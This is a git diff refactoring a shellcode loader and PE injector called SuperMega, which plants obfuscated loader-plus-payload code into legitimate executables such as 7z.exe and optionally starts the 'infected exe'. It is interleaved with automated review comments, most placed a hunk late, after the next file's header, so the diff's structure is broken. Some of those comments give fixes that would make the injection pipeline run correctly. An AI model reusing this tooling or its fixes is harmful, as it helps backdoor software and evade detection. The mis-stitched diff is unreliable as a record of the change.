diff --git a/README.md b/README.md index 1587cd3..d22a7e7 100644 --- a/README.md +++ b/README.md @@ -104,6 +104,8 @@ your own shellcode loader. ### Environment Variables +$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin" + Use ``` "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat" diff --git a/helper.py b/helper.py index 505e866..2f88462 100644 --- a/helper.py +++ b/helper.py @@ -5,7 +5,7 @@ import glob import logging from config import config -from defs import * +from model.defs import * logger = logging.getLogger("Helper") diff --git a/defs.py b/model/defs.py similarity index 100% rename from defs.py rename to model/defs.py diff --git a/model.py b/model/exehost.py similarity index 77% rename from model.py rename to model/exehost.py index 16e54bc..ea6ff2c 100644 --- a/model.py +++ b/model/exehost.py @@ -2,9 +2,11 @@ from typing import Dict import logging import pefile +from model.defs import * import pehelper +from peparser.misc import get_physical_address -logger = logging.getLogger("Model") +logger = logging.getLogger("ExeHost") class IatResolve(): 
@@ -21,21 +23,9 @@ class IatResolve(): self.id ) -def get_physical_address(pe, virtual_address): - # Iterate through the section headers to find which section contains the VA - for section in pe.sections: - # Check if the VA is within the range of this section - if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize: - # Calculate the difference between the VA and the section's virtual address - virtual_offset = virtual_address - section.VirtualAddress - # Add the difference to the section's pointer to raw data - return virtual_offset - #physical_address = section.PointerToRawData + virtual_offset - #return physical_address - return None - -class ExeInfo(): - def __init__(self): +class ExeHost(): + def __init__(self, filepath: FilePath): + self.filepath: FilePath = filepath self.iat_resolves: Dict[str, IatResolve] = {} self.image_base = 0 self.dynamic_base = False @@ -57,12 +47,12 @@ class ExeInfo(): func_name, placeholder, pehelper.get_addr_for(self.iat, func_name)) - def parse_from_exe(self, filepath): - logger.info("--[ Analyzing: {}".format(filepath)) - pe = pefile.PE(filepath) + def init(self): + logger.info("--[ Analyzing: {}".format(self.filepath)) + pe = pefile.PE(self.filepath) if pe.FILE_HEADER.Machine != 0x8664: - raise Exception("Binary is not 64bit: {}".format(filepath)) + raise Exception("Binary is not 64bit: {}".format(self.filepath)) self.ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint self.ep_raw = get_physical_address(pe, self.ep) diff --git a/model/payload.py b/model/payload.py new file mode 100644 index 0000000..c498ebd --- /dev/null +++ b/model/payload.py 
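Review bot: `init()` raises a bare `Exception` when `pe.FILE_HEADER.Machine != 0x8664`, so a caller cannot tell an unsupported input file apart from any other failure; `raise ValueError("Binary is not 64bit: {}".format(self.filepath))` keeps the message and gives a catchable type. The `pefile.PE(self.filepath)` handle opened two lines above is not closed anywhere in the hunk and the method body continues past it, so if no `pe.close()` follows on the success and error paths, the parsing belongs in a `try`/`finally` (or `contextlib.closing`). Since `__init__` now only stores `filepath`, a docstring on `__init__` and `init()` saying that no file is opened until `init()` runs would make the two-phase construction explicit for callers such as `Project.init()`.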
@@ -0,0 +1,20 @@
+import logging
+
+from model import *
+from model.defs import *
+
+logger = logging.getLogger("Payload")
+
+class Payload():
+ def __init__(self, filepath: FilePath):
+ self.payload_path: FilePath = filepath
+ self.payload_data: bytes = b""
+ self.len: int = 0
+
+
+ def init(self):
+ logging.info("--( Load payload: {}".format(self.payload_path))
+ with open(self.payload_path, 'rb') as f:
+ self.payload_data = f.read()
+ self.len = len(self.payload_data)
+
diff --git a/model/project.py b/model/project.py
new file mode 100644
index 0000000..63cb346
--- /dev/null
+++ b/model/project.py
@@ -0,0 +1,21 @@
+import logging
+
+from model import *
+from model.defs import *
+from model.payload import Payload
+from model.exehost import ExeHost
+
+
+logger = logging.getLogger("Project")
+
+
+class Project():
+ def __init__(self, settings):
+ self.settings = settings
+ self.payload = Payload(self.settings.payload_path)
+ self.exe_host = ExeHost(self.settings.inject_exe_in)
+
+
+ def init(self):
+ self.payload.init()
+ self.exe_host.init()
diff --git a/project.py b/model/settings.py
similarity index 64%
rename from project.py
rename to model/settings.py
index 30cd8c3..0c8e216 100644
--- a/project.py
+++ b/model/settings.py
@@ -1,13 +1,11 @@
 from model import *
-from defs import *
+from model.defs import *
-
-class Project():
+class Settings():
 def __init__(self):
- # User, generating normally
 self.payload_path: FilePath = ""
- self.payload_data: bytes = b""
+
 # Settings
 self.source_style: SourceStyle = SourceStyle.peb_walk
 self.alloc_style: AllocStyle = AllocStyle.RWX
 self.exec_style: ExecStyle = ExecStyle.CALL
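Review bot: `Payload.init()` logs through the root logger (`logging.info(...)`) although the module defines `logger = logging.getLogger("Payload")` a few lines above, so the message is not attributed to this module; use `logger.info("--( Load payload: {}".format(self.payload_path))`. `from model import *` inside `model/payload.py` imports the package from one of its own submodules; nothing in the file uses a name from it, so unless `model/__init__.py` exports something needed here it is a no-op that only risks a circular import and can be dropped. A one-line class docstring stating that `payload_data` and `len` stay empty until `init()` is called would document the two-phase construction.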
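Review bot: `Project.init()` loads both `payload` and `exe_host` unconditionally, and `ExeHost` is built from `self.settings.inject_exe_in`, which defaults to `""` in model/settings.py, so a run that does not inject will presumably fail inside `ExeHost.init()` on the empty path rather than skip it; either guard with `if self.settings.inject: self.exe_host.init()` or document that an injection target is always required. `from model import *` is the same self-import as in model/payload.py and is unused here. The class and both methods have no docstrings; one sentence each on what `init()` loads would suffice.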
@@ -20,31 +18,15 @@ class Project():
 self.inject_mode: int = 2
 self.inject_exe_in: FilePath = ""
 self.inject_exe_out: FilePath = ""
- self.exe_info: ExeInfo = None
- # debug
+ # Debug
 self.show_command_output = False
 self.verify: bool = False
- self.try_start_loader_shellcode: bool = False
 self.try_start_final_shellcode: bool = False
 self.try_start_final_infected_exe: bool = False
- self.cleanup_files_on_start: bool = True
 self.cleanup_files_on_exit: bool = True
- self.generate_asm_from_c: bool = True
 self.generate_shc_from_asm: bool = True
-
- def load_payload(self):
- logging.info("--( Load payload: {}".format(self.payload_path))
- with open(self.payload_path, 'rb') as input2:
- self.payload_data = input2.read()
-
-
- def load_injectable(self):
- logging.info("--( Load injectable: {}".format(self.inject_exe_in))
- self.exe_info = ExeInfo()
- self.exe_info.parse_from_exe(self.inject_exe_in)
-
diff --git a/pehelper.py b/pehelper.py
index 61becd0..8088fd8 100644
--- a/pehelper.py
+++ b/pehelper.py
@@ -5,7 +5,7 @@ from keystone import Ks, KS_ARCH_X86, KS_MODE_64
 from capstone import Cs, CS_ARCH_X86, CS_MODE_64
 import logging
-from defs import *
+from model.defs import *
 logger = logging.getLogger("PEHelper")
diff --git a/peparser/misc.py b/peparser/misc.py
new file mode 100644
index 0000000..42e5151
--- /dev/null
+++ b/peparser/misc.py
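Review bot: The hunk removes `try_start_loader_shellcode`, `cleanup_files_on_start` and `generate_asm_from_c` from `Settings.__init__`, but `start()` in supermega.py still reads `settings.cleanup_files_on_start` (its first statement), `settings.generate_asm_from_c` and `settings.try_start_loader_shellcode`; in `main()` the first two appear to be assigned only in the non-`--verify` branch (indentation is not recoverable from the collapsed hunk), and nothing in the visible `main()` hunks assigns `generate_asm_from_c` at all, so `--verify` runs fail with `AttributeError` at the top of `start()` and every run fails at `if settings.generate_asm_from_c:`. Restore the three defaults: `self.try_start_loader_shellcode: bool = False`, `self.cleanup_files_on_start: bool = True`, `self.generate_asm_from_c: bool = True`. The `Settings` class has no docstring; a short one naming which attributes are user options and which are the debug switches under `# Debug` would help, since the class is now the only place the defaults live.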
@@ -0,0 +1,14 @@
+
+
+def get_physical_address(pe, virtual_address):
+ # Iterate through the section headers to find which section contains the VA
+ for section in pe.sections:
+ # Check if the VA is within the range of this section
+ if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize:
+ # Calculate the difference between the VA and the section's virtual address
+ virtual_offset = virtual_address - section.VirtualAddress
+ # Add the difference to the section's pointer to raw data
+ return virtual_offset
+ #physical_address = section.PointerToRawData + virtual_offset
+ #return physical_address
+ return None
diff --git a/phases/assembler.py b/phases/assembler.py
index e53f3a9..87b17f9 100644
--- a/phases/assembler.py
+++ b/phases/assembler.py
@@ -17,7 +17,7 @@ def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath, shellcode_out: FileP
 asm_in,
 "/link",
 "/OUT:{}".format(build_exe),
- "/entry:AlignRSP"
+ "/entry:AlignRSP" # "/entry:main",
 ])
 if not os.path.isfile(build_exe):
 raise Exception("Compiling failed")
diff --git a/phases/compiler.py b/phases/compiler.py
index 23ef854..91dc4c4 100644
--- a/phases/compiler.py
+++ b/phases/compiler.py
@@ -166,7 +166,7 @@ def get_function_stubs(asm_in: FilePath):
 return functions
-def fixup_iat_reuse(filename: FilePath, exe_info):
+def fixup_iat_reuse(filename: FilePath, exe_host):
 with open(filename, 'r', encoding='utf-8') as asmfile:
 lines = asmfile.readlines()
@@ -180,7 +180,7 @@ def fixup_iat_reuse(filename: FilePath, exe_info):
 randbytes: bytes = os.urandom(6)
 lines[idx] = bytes_to_asm_db(randbytes) + " ; IAT Reuse for {}".format(func_name)
 lines[idx] += "\n"
- exe_info.add_iat_resolve(func_name, randbytes)
+ exe_host.add_iat_resolve(func_name, randbytes)
 logger.info(" > Replace func name: {} with {}".format(
 func_name, randbytes.hex()))
diff --git a/phases/injector.py b/phases/injector.py
index c68709f..49c5e71 100644
--- a/phases/injector.py
+++ b/phases/injector.py
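Review bot: `get_physical_address` does not return a physical address: the comment `# Add the difference to the section's pointer to raw data` describes the commented-out `PointerToRawData` line, while the live code returns `virtual_offset`, the offset inside the containing section, and the callers (`self.ep_raw` in model/exehost.py, `code[ep_raw:ep_raw+300]` in supermega.py) index the extracted section data with it. Replace the stale comment with `# Return the offset inside the containing section; callers index the extracted section data, so PointerToRawData is deliberately not added` and give the function a docstring saying the same, or rename it. The `return None` fall-through for an address outside every section only surfaces later as a `TypeError` in the slice; `raise ValueError("VA 0x{:x} is not inside any section".format(virtual_address))` reports it at the source. supermega.py still carries its own identical copy of this function (visible as context in its `-113` and `-137` hunks); the commit replaced the copy in model/exehost.py with this import but not that one.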
@@ -4,9 +4,10 @@ import pprint
 import logging
 import time
 import tempfile
+import logging
 from pehelper import *
-from model import *
+from model.exehost import *
 from observer import observer
 from helper import rbrunmode_str
 from derbackdoorer.derbackdoorer import PeBackdoor
@@ -56,17 +57,17 @@ def inject_exe(
 raise Exception("Shellcode injection error")
-def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo):
+def injected_fix_iat(exe_out: FilePath, exe_host: ExeHost):
 """replace IAT in shellcode in code and re-implant it"""
 # get code section of exe_out
 code = extract_code_from_exe(exe_out)
- for cap in exe_info.get_all_iat_resolvs().values():
+ for cap in exe_host.get_all_iat_resolvs().values():
 if not cap.id in code:
 raise Exception("IatResolve ID {} not found, abort".format(cap.id))
 off = code.index(cap.id)
- current_address = off + exe_info.image_base + exe_info.code_virtaddr
+ current_address = off + exe_host.image_base + exe_host.code_virtaddr
 #current_address += 2
 destination_address = cap.addr
 logger.info(" Replace at 0x{:x} with call to 0x{:x}".format(
@@ -81,7 +82,7 @@ def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo):
 write_code_section(exe_file=exe_out, new_data=code)
-def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info):
+def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_host):
 data_reuser = DataReuser(exe_path)
 data_reuser.init()
 #ret = data_reuser.get_reloc_largest_gap(".rdata")
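Review bot: `import logging` is added although the module already imports it three lines above (the context line `import logging`), so the new line is a duplicate and should be dropped. `from model.exehost import *` pulls every public name of that module (its `logger`, `pefile`, `Dict`, the re-exported `model.defs` names) into this namespace only to obtain the `ExeHost` annotation used by `injected_fix_iat`; `from model.exehost import ExeHost` makes the dependency explicit and, depending on where this module defines its own `logger`, avoids replacing it with the `"ExeHost"` logger.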
@@ -111,8 +112,8 @@ def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info):
 f.seek(addr)
 f.write(var_data)
 #f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAA")
- print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_info.image_base))
- fixup["addr"] = addr + sect.virt_addr + exe_info.image_base - sect.raw_addr
+ print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_host.image_base))
+ fixup["addr"] = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr
 addr += len(var_data) + 8
 #data_reuser.pe.write(exe_path + ".tmp")
 #data_reuser.pe.close()
@@ -125,7 +126,7 @@ def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info):
 raise Exception("DataResuse: ID {} not found, abort".format(fixup["randbytes"]))
 off = code.index(fixup["randbytes"])
- current_address = off + exe_info.image_base + exe_info.code_virtaddr
+ current_address = off + exe_host.image_base + exe_host.code_virtaddr
 destination_address = fixup["addr"]
 logger.info(" Replace at 0x{:x} with call to 0x{:x}".format(
 current_address, destination_address
diff --git a/phases/templater.py b/phases/templater.py
index 726d4ff..cda8a0f 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -5,7 +5,7 @@ import logging
 from helper import *
 from observer import observer
-from defs import *
+from model.defs import *
 use_templates = True
 logger = logging.getLogger("Assembler")
diff --git a/r2helper.py b/r2helper.py
index 9f6938c..d7cfb21 100644
--- a/r2helper.py
+++ b/r2helper.py
@@ -1,7 +1,7 @@
 import r2pipe
 import os
-from defs import *
+from model.defs import *
 from helper import hexdump
 def r2_disas(data: bytes):
diff --git a/supermega.py b/supermega.py
index 7c04c19..a1281f1 100644
--- a/supermega.py
+++ b/supermega.py
@@ -5,8 +5,9 @@ from typing import Dict
 import os
 import logging
 import time
+import pefile
-from defs import *
+from model.defs import *
 from model import *
 from helper import *
 from config import config
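Review bot: The rewritten line `print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_host.image_base))` writes a diagnostic straight to stdout while the rest of `injected_fix_data` reports through `logger.info`; `logger.debug("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_host.image_base))` keeps it out of normal output and inside the log the tool already collects. The commented-out `#f.write(...)`, `#data_reuser.pe.write(...)` and `#data_reuser.pe.close()` lines around it are dead code the rename passed over; remove them or turn them into a comment that says why they are kept. The enclosing function starts before this hunk.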
@@ -15,16 +16,18 @@ import phases.compiler
 import phases.assembler
 import phases.injector
 from observer import observer
-from project import Project
 from pehelper import extract_code_from_exe
+from model.project import Project
+from model.settings import Settings
+
 log_messages = []
 def main():
 logger.info("Super Mega")
 config.load()
- project = Project()
+ settings = Settings()
 parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
 parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
@@ -47,57 +50,57 @@ def main():
 config.ShowCommandOutput = True
 if args.verify:
- project.payload_path = "shellcodes/createfile.bin"
- project.verify = True
+ settings.payload_path = "shellcodes/createfile.bin"
+ settings.verify = True
- project.try_start_final_infected_exe = False
- project.try_start_final_shellcode = False
+ settings.try_start_final_infected_exe = False
+ settings.try_start_final_shellcode = False
 if args.verify == "peb":
- project.inject = True
- project.inject_mode = 2
- project.inject_exe_in = "exes/7z.exe"
- project.inject_exe_out = "out/7z-verify.exe"
+ settings.inject = True
+ settings.inject_mode = 2
+ settings.inject_exe_in = "exes/7z.exe"
+ settings.inject_exe_out = "out/7z-verify.exe"
 elif args.verify == "iat":
- project.inject = True
- project.inject_mode = 1 # 2
- project.inject_exe_in = "exes/procexp64.exe"
- project.inject_exe_out = "out/procexp64-verify.exe"
+ settings.inject = True
+ settings.inject_mode = 1 # 2
+ settings.inject_exe_in = "exes/procexp64.exe"
+ settings.inject_exe_out = "out/procexp64-verify.exe"
 elif args.verify == "rwx":
- project.inject = True
- project.inject_mode = 1 # ,2 is broken atm
- project.inject_exe_in = "exes/wifiinfoview.exe"
- project.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
+ settings.inject = True
+ settings.inject_mode = 1 # ,2 is broken atm
+ settings.inject_exe_in = "exes/wifiinfoview.exe"
+ settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
 else:
 logger.info("Unknown verify option {}, use std/iat".format(args.verify))
 return
 else:
- project.try_start_final_infected_exe = args.start_injected
- project.try_start_final_shellcode = args.start_final_shellcode
- project.try_start_loader_shellcode = args.start_loader_shellcode
+ settings.try_start_final_infected_exe = args.start_injected
+ settings.try_start_final_shellcode = args.start_final_shellcode
+ settings.try_start_loader_shellcode = args.start_loader_shellcode
- project.cleanup_files_on_start = not args.no_clean_at_start
- project.cleanup_files_on_exit =not args.no_clean_at_exit
+ settings.cleanup_files_on_start = not args.no_clean_at_start
+ settings.cleanup_files_on_exit =not args.no_clean_at_exit
 if args.short_call_patching:
- project.short_call_patching = True
+ settings.short_call_patching = True
 if args.alloc:
 if args.alloc == "rwx_1":
- project.alloc_style = AllocStyle.RWX
+ settings.alloc_style = AllocStyle.RWX
 if args.decoder:
 if args.decoder == "plain_1":
- project.decoder_style = DecoderStyle.PLAIN_1
+ settings.decoder_style = DecoderStyle.PLAIN_1
 elif args.decoder == "xor_1":
- project.decoder_style = DecoderStyle.XOR_1
+ settings.decoder_style = DecoderStyle.XOR_1
 if args.exec:
 if args.exec == "direct_1":
- project.exec_style = ExecStyle.CALL
+ settings.exec_style = ExecStyle.CALL
 if args.rbrunmode:
 if args.rbrunmode == "1" or args.rbrunmode == "2":
- project.inject_mode = int(args.rbrunmode)
+ settings.inject_mode = int(args.rbrunmode)
 else:
 logging.error("Invalid mode, use one of:")
 for i in ["1", "2"]:
@@ -113,16 +116,16 @@ def main():
 if not os.path.isfile(args.shellcode):
 logger.info("Could not find: {}".format(args.shellcode))
 return
- project.payload_path = args.shellcode
+ settings.payload_path = args.shellcode
 if args.inject:
 if not os.path.isfile(args.inject):
 logger.info("Could not find: {}".format(args.inject))
 return
- project.inject = True
- project.inject_exe_in = args.inject
- project.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
+ settings.inject = True
+ settings.inject_exe_in = args.inject
+ settings.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
- start(project)
+ start(settings)
 def get_physical_address(pe, virtual_address):
 # Iterate through the section headers to find which section contains the VA
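Review bot: `settings.cleanup_files_on_exit =not args.no_clean_at_exit` is missing the space after `=`; write `settings.cleanup_files_on_exit = not args.no_clean_at_exit` to match the line above it. The `--verify` branch hard-codes fixture paths under `exes/` and `out/` and `inject_mode` values annotated only with `# 2` and `# ,2 is broken atm`, but unlike the `--inject` path below it never checks that the input file exists before `start()` hands it to `pefile`; adding the same `os.path.isfile` check, and turning the two comments into a sentence on why mode 2 is disabled for that fixture, would make a missing or broken fixture fail with a message rather than a parser exception. The `else:` branch also writes `settings.try_start_loader_shellcode` and `settings.cleanup_files_on_start`, which model/settings.py no longer declares, so whether they exist on the object now depends on which branch ran.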
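Review bot: `settings.inject_exe_out = args.inject.replace(".exe", ".infected.exe")` substitutes every `.exe` occurrence anywhere in the path, and when the input carries a different extension (or upper-case `.EXE`) the output path equals the input path, so the injector would overwrite the file the user passed in. Derive the name from the extension instead: `root, ext = os.path.splitext(args.inject)` then `settings.inject_exe_out = root + ".infected" + ext`; `os` is already in scope (`os.path.isfile` two lines above). Checking that the result differs from `args.inject` before `start(settings)` would close the remaining case.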
@@ -137,88 +140,88 @@ def get_physical_address(pe, virtual_address):
 #return physical_address
 return None
-def start(project: Project):
+def start(settings: Settings):
 # Delete: all old files
- if project.cleanup_files_on_start:
+ if settings.cleanup_files_on_start:
 clean_files()
 delete_all_files_in_directory("logs/")
 # Load our input
- project.load_payload()
- project.load_injectable()
+ project = Project(settings)
+ project.init()
 # Copy: IAT_REUSE loader C files into working directory: build/
 phases.templater.create_c_from_template(
 source_style = SourceStyle.iat_reuse,
- alloc_style = project.alloc_style,
- exec_style = project.exec_style,
- decoder_style= project.decoder_style,
- payload_len = len(project.payload_data),
+ alloc_style = settings.alloc_style,
+ exec_style = settings.exec_style,
+ decoder_style= settings.decoder_style,
+ payload_len = project.payload.len,
 )
 # Compile: IAT_REUSE loader C -> ASM
- if project.generate_asm_from_c:
+ if settings.generate_asm_from_c:
 phases.compiler.compile(
 c_in = main_c_file,
 asm_out = main_asm_file,
- payload_len = len(project.payload_data),
- short_call_patching = project.short_call_patching)
+ payload_len = project.payload.len,
+ short_call_patching = project.settings.short_call_patching)
 # Decide if we can use IAT_REUSE (all function calls available as import)
 required_functions = phases.compiler.get_function_stubs(main_asm_file)
- if project.exe_info.has_all_functions(required_functions):
- project.source_style = SourceStyle.iat_reuse
+ if project.exe_host.has_all_functions(required_functions):
+ settings.source_style = SourceStyle.iat_reuse
 logger.warning("--[ SourceStyle: Using IAT_REUSE".format())
 # all good, patch ASM
- phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_info)
+ phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_host)
 observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
 else:
 # Not good, Fall back to PEB_WALK
- project.source_style = SourceStyle.peb_walk
+ settings.source_style = SourceStyle.peb_walk
 logger.warning("--[ SourceStyle: Fall back to PEB_WALK".format())
 observer.clean_files()
 clean_files()
 # Copy: PEB_WALK loader C files into working directory: build/
 phases.templater.create_c_from_template(
 source_style = SourceStyle.peb_walk,
- alloc_style = project.alloc_style,
- exec_style = project.exec_style,
- decoder_style= project.decoder_style,
- payload_len = len(project.payload_data),
+ alloc_style = settings.alloc_style,
+ exec_style = settings.exec_style,
+ decoder_style= settings.decoder_style,
+ payload_len = project.payload.len,
 )
 # Compile: PEB_WALK C -> ASM
- if project.generate_asm_from_c:
+ if settings.generate_asm_from_c:
 phases.compiler.compile(
 c_in = main_c_file,
 asm_out = main_asm_file,
- payload_len = len(project.payload_data))
+ payload_len = project.payload.len)
 observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
 # Assemble: ASM -> Shellcode
- if project.generate_shc_from_asm:
+ if settings.generate_shc_from_asm:
 phases.assembler.asm_to_shellcode(
 asm_in = main_asm_file,
 build_exe = main_exe_file,
 shellcode_out = main_shc_file)
 # Try: Starting the loader-shellcode (rarely useful)
- if project.try_start_loader_shellcode:
+ if settings.try_start_loader_shellcode:
 try_start_shellcode(main_shc_file)
 # Merge: shellcode/loader with payload
- if project.dataref_style == DataRefStyle.APPEND:
+ if settings.dataref_style == DataRefStyle.APPEND:
 phases.assembler.merge_loader_payload(
 shellcode_in = main_shc_file,
 shellcode_out = main_shc_file,
- payload_data = project.payload_data,
- decoder_style = project.decoder_style)
+ payload_data = project.payload.payload_data,
+ decoder_style = settings.decoder_style)
- if project.verify and project.source_style == SourceStyle.peb_walk:
+ if settings.verify and settings.source_style == SourceStyle.peb_walk:
 logger.info("--[ Verify final shellcode")
 if not verify_shellcode(main_shc_file):
 logger.info("Could not verify, still continuing")
 #return
- if project.try_start_final_shellcode:
+ if settings.try_start_final_shellcode:
 logger.info("--[ Test Append shellcode")
 try_start_shellcode(main_shc_file)
@@ -226,9 +229,9 @@ def start(project: Project):
 shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
 # RWX Injection
- if project.exe_info.rwx_section != None:
+ if project.exe_host.rwx_section != None:
 logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
- project.exe_info.rwx_section.Name.decode().rstrip('\x00')
+ project.exe_host.rwx_section.Name.decode().rstrip('\x00')
 ))
 obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn")
 observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn"))
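Review bot: `start()` now reads the same options from two objects: the first `phases.compiler.compile(...)` call passes `short_call_patching = project.settings.short_call_patching` while every neighbouring argument uses `settings.` directly and `Project(settings)` was built from that very object; use `settings.short_call_patching` so the function has one source of truth. The function also writes the IAT_REUSE/PEB_WALK decision back into `settings.source_style`, so the `Settings` object doubles as run-time state, which the new `Project` wrapper looked meant to take over; keeping the derived `source_style` on `project` would separate configuration from results. The `logger.warning("--[ SourceStyle: Using IAT_REUSE".format())` and matching PEB_WALK line carry a no-op `.format()` that can be dropped. The function continues past the end of this hunk.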
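Review bot: `if project.exe_host.rwx_section != None:` tests for `None` with `!=`; the idiomatic form, and the one that does not route through whatever `__ne__` the pefile section object defines, is `if project.exe_host.rwx_section is not None:`. The enclosing `start()` body begins before this hunk.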
@@ -236,33 +239,33 @@ def start(project: Project):
 # inject merged loader into an exe
 exit_code = 0
- if project.inject:
+ if settings.inject:
 l = len(file_readall_binary(main_shc_file))
- if l + 128 > project.exe_info.code_size:
+ if l + 128 > project.exe_host.code_size:
 logger.error("Error: Shellcode {}+128 too small for target code section {}".format(
- l, project.exe_info.code_size
+ l, project.exe_host.code_size
 ))
 return
 phases.injector.inject_exe(
 shellcode_in = main_shc_file,
- exe_in = project.inject_exe_in,
- exe_out = project.inject_exe_out,
- inject_mode = project.inject_mode,
+ exe_in = settings.inject_exe_in,
+ exe_out = settings.inject_exe_out,
+ inject_mode = settings.inject_mode,
 )
- if project.source_style == SourceStyle.iat_reuse:
+ if settings.source_style == SourceStyle.iat_reuse:
 phases.injector.injected_fix_iat(
- project.inject_exe_out, project.exe_info)
+ settings.inject_exe_out, project.exe_host)
 # TODO IF?
 phases.injector.injected_fix_data(
- project.inject_exe_out,
+ settings.inject_exe_out,
 config.data_fixups,
 config.data_fixup_entries,
- project.exe_info)
+ project.exe_host)
- code = extract_code_from_exe(project.inject_exe_out)
- pe = pefile.PE(project.inject_exe_out)
+ code = extract_code_from_exe(settings.inject_exe_out)
+ pe = pefile.PE(settings.inject_exe_out)
 ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
 ep_raw = get_physical_address(pe, ep)
 pe.close()
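Review bot: The condition `if l + 128 > project.exe_host.code_size:` is right, but the message on the next line says the shellcode is `too small for target code section`, which inverts the failure: the loader plus 128 bytes is too large for the section. Reword it to `"Error: Shellcode {}+128 does not fit into target code section {}"`. That branch also returns with `exit_code` still at the `0` assigned two lines earlier; the rest of the function is outside the hunk, so if `exit_code` becomes the process exit status the early `return` hides the failure from scripts and CI, and `return 1` (or raising) would surface it. The `# TODO IF?` above `injected_fix_data` should say what the missing condition is, or be resolved.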
@@ -273,18 +276,18 @@ def start(project: Project):
 code[ep_raw:ep_raw+300])
- if project.verify:
+ if settings.verify:
 logger.info("--[ Verify infected exe")
- exit_code = phases.injector.verify_injected_exe(project.inject_exe_out)
+ exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out)
- elif project.try_start_final_infected_exe:
- logger.info("--[ Start infected exe: {}".format(project.inject_exe_out))
+ elif settings.try_start_final_infected_exe:
+ logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out))
 run_process_checkret([
- project.inject_exe_out,
+ settings.inject_exe_out,
 ], check=False)
 # Cleanup files
- if project.cleanup_files_on_exit:
+ if settings.cleanup_files_on_exit:
 clean_files()
 # write log to file
diff --git a/tests/test_asm.py b/tests/test_asm.py
index 0a666ee..972b8f4 100644
--- a/tests/test_asm.py
+++ b/tests/test_asm.py
@@ -4,8 +4,8 @@ import unittest
 import logging
 from phases.compiler import fixup_asm_file, fixup_iat_reuse
-from model import ExeInfo
-from defs import *
+from model.exehost import ExeHost
+from model.defs import *
 from observer import observer
@@ -44,15 +44,15 @@ class AsmTest(unittest.TestCase):
 path_working: FilePath = "tests/data/iat_reuse_pre_fixup.asm.test"
 shutil.copy(path_in, path_working)
- exe_info = ExeInfo()
+ exe_host = ExeHost()
- fixup_iat_reuse(path_working, exe_info)
- self.assertTrue(len(exe_info.iat_resolves), 2)
+ fixup_iat_reuse(path_working, exe_host)
+ self.assertTrue(len(exe_host.iat_resolves), 2)
- self.assertTrue("GetEnvironmentVariableW" in exe_info.iat_resolves)
- self.assertEqual(exe_info.iat_resolves["GetEnvironmentVariableW"].name, "GetEnvironmentVariableW")
- self.assertEqual(exe_info.iat_resolves["GetEnvironmentVariableW"].addr, 0)
- self.assertTrue(len(exe_info.iat_resolves["GetEnvironmentVariableW"].id), 6) # 6 random bytes
+ self.assertTrue("GetEnvironmentVariableW" in exe_host.iat_resolves)
+ self.assertEqual(exe_host.iat_resolves["GetEnvironmentVariableW"].name, "GetEnvironmentVariableW")
+ self.assertEqual(exe_host.iat_resolves["GetEnvironmentVariableW"].addr, 0)
+ self.assertTrue(len(exe_host.iat_resolves["GetEnvironmentVariableW"].id), 6) # 6 random bytes
 with open(path_working, "r") as f:
 lines = f.readlines()
diff --git a/tests/test_datareuse.py b/tests/test_datareuse.py
index 0f310d2..306ee62 100644
--- a/tests/test_datareuse.py
+++ b/tests/test_datareuse.py
@@ -3,11 +3,6 @@ from typing import List
 import unittest
 import logging
-from model import ExeInfo
-from defs import *
-from helper import hexdump
-from observer import observer
-
 from phases.datareuse import *
@@ -69,7 +64,7 @@ class DataReuseTest(unittest.TestCase):
 fixup = data_fixups[0]
 self.assertTrue(fixup["string_ref"], "rcx")
 self.assertTrue(fixup["register"], "$SG72513")
- self.assertEqual(5, len(fixup["randbytes"]))
+ self.assertEqual(7, len(fixup["randbytes"])) # needs to be 7!
 asmFileParser.write_lines_to(asm_out)
diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py
index 001f474..02e5454 100644
--- a/tests/test_derbackdoorer.py
+++ b/tests/test_derbackdoorer.py
